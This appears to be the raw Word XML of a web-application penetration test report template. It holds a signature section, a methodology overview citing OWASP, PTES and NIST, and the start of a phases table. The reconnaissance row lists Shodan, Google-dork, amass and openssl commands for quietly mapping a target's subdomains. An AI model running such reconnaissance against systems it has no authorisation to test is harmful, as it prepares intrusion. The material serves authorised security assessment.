              <w:t>What type of encryption is used?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5BA6915C" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="053B327B" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="003D4623" w:rsidRDefault="00112BBC" w:rsidP="00112BBC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="61" w:name="approval-and-acknowledgements"/>
      <w:bookmarkStart w:id="62" w:name="_Toc178498976"/>
      <w:bookmarkEnd w:id="53"/>
      <w:bookmarkEnd w:id="60"/>
      <w:r w:rsidRPr="003D4623">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Approval and Acknowledgements</w:t>
      </w:r>
      <w:bookmarkEnd w:id="62"/>
    </w:p>
    <w:p w14:paraId="4B0C59F2" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00112BBC">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>The result of test will be presented in the form of a PDF report with a description of the activities carried out, the vulnerability findings with risk classification and the mitigation recommendations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E37AC5" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00112BBC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E9B9F3" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00000000" w:rsidP="00112BBC">
      <w:r>
        <w:pict w14:anchorId="2D637E6A">
          <v:rect id="_x0000_i1113" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="798F65B5" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00112BBC">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Signature of contact representing target organization/department</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3DC712" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00000000" w:rsidP="00112BBC">
      <w:r>
        <w:pict w14:anchorId="5CF5747C">
          <v:rect id="_x0000_i1114" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="160AA9D3" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00112BBC">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Signature of head of Auditors team</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3221C48B" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00000000" w:rsidP="00112BBC">
      <w:r>
        <w:pict w14:anchorId="4F8299EE">
          <v:rect id="_x0000_i1115" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="547DC783" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRDefault="00112BBC" w:rsidP="00112BBC">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Signatures of individual auditors:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B478E85" w14:textId="1663A623" w:rsidR="007826FC" w:rsidRPr="001A2C49" w:rsidRDefault="007826FC" w:rsidP="00E733BE">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="63" w:name="application-map"/>
      <w:bookmarkStart w:id="64" w:name="_Toc178498977"/>
      <w:r w:rsidRPr="001A2C49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Methodology</w:t>
      </w:r>
      <w:bookmarkEnd w:id="64"/>
    </w:p>
    <w:p w14:paraId="5E33E7F9" w14:textId="7F79B995" w:rsidR="00475B86" w:rsidRPr="00D01CE0" w:rsidRDefault="009D043B">
      <w:bookmarkStart w:id="65" w:name="_xi9pwbdo96zs" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="19"/>
      <w:bookmarkEnd w:id="61"/>
      <w:bookmarkEnd w:id="63"/>
      <w:bookmarkEnd w:id="65"/>
      <w:r>
        <w:t>Our</w:t>
      </w:r>
      <w:r w:rsidR="00922DBC" w:rsidRPr="00D01CE0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> testing methodology was split into three phases: Reconnaissance, Target Assessment, and Execution of Vulnerabilities. During reconnaissance, we gathered information about &lt;CLIENT NAME&gt;’s network systems. </w:t>
      </w:r>
      <w:r w:rsidR="003D0BA5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>We</w:t>
      </w:r>
      <w:r w:rsidR="00922DBC" w:rsidRPr="00D01CE0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> used port scanning and other enumeration methods to refine target information and assess target values. Next, we conducted our targeted assessment. </w:t>
      </w:r>
      <w:r w:rsidR="003D0BA5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>We</w:t>
      </w:r>
      <w:r w:rsidR="00922DBC" w:rsidRPr="00D01CE0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> simulated an attacker exploiting vulnerabilities in the &lt;CLIENT NAME&gt; network. </w:t>
      </w:r>
      <w:r w:rsidR="003D0BA5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>We</w:t>
      </w:r>
      <w:r w:rsidR="00922DBC" w:rsidRPr="00D01CE0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> gathered evidence of vulnerabilities during this phase of the engagement while conducting the simulation in a manner that would not disrupt normal business operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0264B74E" w14:textId="77777777" w:rsidR="001D7723" w:rsidRDefault="001D7723" w:rsidP="001D7723"/>
    <w:p w14:paraId="51DFB373" w14:textId="21049779" w:rsidR="003D0BA5" w:rsidRPr="0001060D" w:rsidRDefault="00922DBC" w:rsidP="0001060D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1F04327A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The following image is a graphical representation of this methodology.</w:t>
      </w:r>
      <w:bookmarkStart w:id="66" w:name="_tt2dclm9r0d3" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="67" w:name="_r2tozm8dlceh" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="66"/>
      <w:bookmarkEnd w:id="67"/>
    </w:p>
    <w:p w14:paraId="2823BB69" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRDefault="003D0BA5" w:rsidP="003D0BA5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="68" w:name="methodology"/>
      <w:bookmarkStart w:id="69" w:name="overview"/>
      <w:bookmarkStart w:id="70" w:name="_Toc178498978"/>
      <w:r w:rsidRPr="00037BB4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Overview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="70"/>
    </w:p>
    <w:p w14:paraId="02F01965" w14:textId="500AF20F" w:rsidR="0001060D" w:rsidRDefault="0001060D" w:rsidP="0001060D">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="71" w:name="_Toc177321909"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4EF51666" wp14:editId="796DB663">
            <wp:extent cx="4857750" cy="5181600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4" name="image1.png" descr="A diagram of a team methodology&#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A diagram of a team methodology&#10;&#10;Description automatically generated"/>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4868398" cy="5192958"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkEnd w:id="71"/>
    </w:p>
    <w:p w14:paraId="0A170C85" w14:textId="77777777" w:rsidR="00063F15" w:rsidRDefault="00063F15" w:rsidP="0001060D">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="333BF6C5" w14:textId="77777777" w:rsidR="00063F15" w:rsidRDefault="00063F15" w:rsidP="0001060D">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C3EB119" w14:textId="77777777" w:rsidR="00063F15" w:rsidRDefault="00063F15" w:rsidP="0001060D">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EB29D9F" w14:textId="77777777" w:rsidR="00063F15" w:rsidRDefault="00063F15" w:rsidP="0001060D">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F125FC0" w14:textId="77777777" w:rsidR="00063F15" w:rsidRDefault="00063F15" w:rsidP="0001060D">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62D26E52" w14:textId="77777777" w:rsidR="00063F15" w:rsidRDefault="00063F15" w:rsidP="0001060D">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34BE71F4" w14:textId="77777777" w:rsidR="00063F15" w:rsidRDefault="00063F15" w:rsidP="0001060D">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2024E500" w14:textId="77777777" w:rsidR="00063F15" w:rsidRDefault="00063F15" w:rsidP="0001060D">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29A9C7B7" w14:textId="77777777" w:rsidR="00063F15" w:rsidRDefault="00063F15" w:rsidP="0001060D">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75B0BE00" w14:textId="77777777" w:rsidR="00063F15" w:rsidRPr="0001060D" w:rsidRDefault="00063F15" w:rsidP="0001060D">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DD9630A" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRDefault="003D0BA5" w:rsidP="003D0BA5">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Web Application Vulnerability Assessment and Penetration Testing (VAPT)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> was conducted using a multi-phase approach, based on established security frameworks and industry standards, including </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>OWASP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PTES</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NIST SP 800-115</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>OSSTMM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. This methodology is designed to identify, exploit, and document vulnerabilities in the target application while ensuring minimal disruption to the environment </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B963CE" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRDefault="003D0BA5" w:rsidP="003D0BA5">
      <w:r>
        <w:pict w14:anchorId="0DF42144">
          <v:rect id="_x0000_i1081" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E36A257" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRDefault="003D0BA5" w:rsidP="003D0BA5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="72" w:name="X59c9a5f00f698d9422d95c07420276b5afa521e"/>
      <w:bookmarkStart w:id="73" w:name="_Toc178498979"/>
      <w:bookmarkEnd w:id="69"/>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Phases of Penetration Testing (Senior </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Pentester’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Approach)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="73"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1899"/>
        <w:gridCol w:w="7461"/>
      </w:tblGrid>
      <w:tr w:rsidR="003D0BA5" w14:paraId="63050DE3" w14:textId="77777777" w:rsidTr="00211D1D">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single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="50FEA88A" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00D76B47" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Phase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5494942B" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00D76B47" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Description, Techniques, and Advanced Commands</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D0BA5" w14:paraId="4E5CEDA6" w14:textId="77777777" w:rsidTr="00211D1D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="262626" w:themeFill="text1" w:themeFillTint="D9"/>
          </w:tcPr>
          <w:p w14:paraId="53F29641" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00D76B47" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>1. Reconnaissance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1C7B1ED2" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00D76B47" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>reconnaissance is your foundation, and experience tells you that thorough recon is often the difference between success and failure. You balance passive and active recon, knowing when to remain stealthy and when to probe more actively.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A5A24A6" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00D76B47" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Approach &amp; Commands</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3CBD49" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00D76B47" w:rsidRDefault="003D0BA5" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="25"/>
              </w:numPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Start with passive recon like WHOIS lookups, DNS queries, and subdomain enumeration without alerting the target. - You may use </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Google Dorking</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> and </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Shodan API</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> to detect exposed assets (e.g., </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>shodan</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> host &lt;IP_ADDRESS&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">), but the real value comes when you manually search for forgotten legacy systems using custom dorks like </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>site:example.com</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> -www -admin</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> to find uncommon subdomains. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48367036" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="0053628C" w:rsidRDefault="003D0BA5" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="25"/>
              </w:numPr>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Leverage </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>DNS brute-forcing</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> with tools like </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>dnsenum</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> or </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>amass</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> for deeper subdomain discovery: </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">bash amass </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>enum</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> -d example.com -o subdomains.txt</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> - Review SSL/TLS certs for exposed subdomains:  </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">bash </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>openssl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>s_client</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> -connect example.com:443 -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>showcerts</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="6B7BA786" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="01D6ACB4" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="23AC33F5" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="20520B2F" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0683D801" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0B024E3F" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
